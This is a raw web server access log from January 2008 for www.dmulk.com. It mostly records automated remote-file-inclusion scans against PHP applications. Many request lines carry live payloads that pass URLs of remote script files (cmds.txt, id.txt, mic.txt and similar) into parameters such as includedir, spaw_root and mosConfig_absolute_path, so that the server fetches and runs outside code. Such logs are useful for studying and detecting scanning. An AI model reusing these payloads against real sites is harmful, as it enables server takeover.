63.247.131.26 - - [10/Jan/2008:09:40:06 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:50 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:50 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:51 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:52 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:52 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:40:54 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:09:41:06 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:41:12 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:41:18 -0800] "GET //skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:18 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:21 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:21 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:22 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:41:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:41:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:37 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:37 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:38 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:09:41:41 -0800] "GET /logs/access_071222.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:09:41:43 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:09:41:46 -0800] "GET /logs//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 30152 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:58 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:59 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:41:59 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:42:25 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:42:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:42:27 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [10/Jan/2008:09:42:47 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [10/Jan/2008:09:42:50 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [10/Jan/2008:09:42:51 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.95.15 - - [10/Jan/2008:09:43:36 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.95.15 - - [10/Jan/2008:09:43:37 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.95.15 - - [10/Jan/2008:09:43:37 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.215.230.140 - - [10/Jan/2008:09:45:01 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [10/Jan/2008:09:45:02 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [10/Jan/2008:09:45:03 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:46:01 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.79.177.204 - - [10/Jan/2008:09:46:08 -0800] "GET /logs/access_071109.log HTTP/1.1" 200 29983 "http://www.google.com/search?hl=en&rlz=1T4GGLJ_enUS254US254&q=%22safe.gif%22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:46:53 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:47:05 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:47:29 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:09:48:24 -0800] "GET /minamijewelry/source_images/updated1/bird.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:09:48:33 -0800] "GET /minamijewelry/source_images/updated1/moon.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:09:48:54 -0800] "GET /megumi/Necklace/3_Turquoise_Sterling_Silver_Set_Blue_70.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:09:49:14 -0800] "GET /minamijewelry/source_images/updated1/dream.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:09:49:37 -0800] "GET /minamijewelry/html/images/flower_character.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:50:22 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:50:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:50:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:50:37 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:50:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:50:37 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:50:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:50:38 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:50:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:50:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:50:53 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:50:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:51:17 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:51:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:52:15 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:52:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:52:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.145 - - [10/Jan/2008:09:52:37 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:54:59 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:59:03 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:59:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:59:04 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:10:01:16 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:01:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:01:31 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:01:31 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:01:31 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:10:01:35 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://facchinaggio.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:10:01:36 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://facchinaggio.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:10:01:36 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://facchinaggio.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.140.234.80 - - [10/Jan/2008:10:03:55 -0800] "GET /logs/access_071205.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:10:05:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:10:05:37 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:05:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.35.196.53 - - [10/Jan/2008:10:05:50 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:10:06:30 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:10:06:45 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:10:06:54 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:10:06:54 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
70.86.119.18 - - [10/Jan/2008:10:08:04 -0800] "GET //skin/zero_vote/errors.php?error=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
70.86.119.18 - - [10/Jan/2008:10:08:04 -0800] "GET /logs//skin/zero_vote/errors.php?error=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:10:09:13 -0800] "GET /logs/access_071225.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:10:09:16 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:10:09:23 -0800] "GET /logs//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 29543 "-" "libwww-perl/5.805" "www.dmulk.com"
212.159.3.236 - - [10/Jan/2008:10:13:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.234 - - [10/Jan/2008:10:13:28 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.236 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.159.3.233 - - [10/Jan/2008:10:13:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:10:13:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:10:13:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:10:13:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:10:13:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:10:16:41 -0800] "GET /logs/access_071225.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.35.191.105 - - [10/Jan/2008:10:19:42 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.35.196.53 - - [10/Jan/2008:10:27:11 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.35.196.53 - - [10/Jan/2008:10:27:11 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
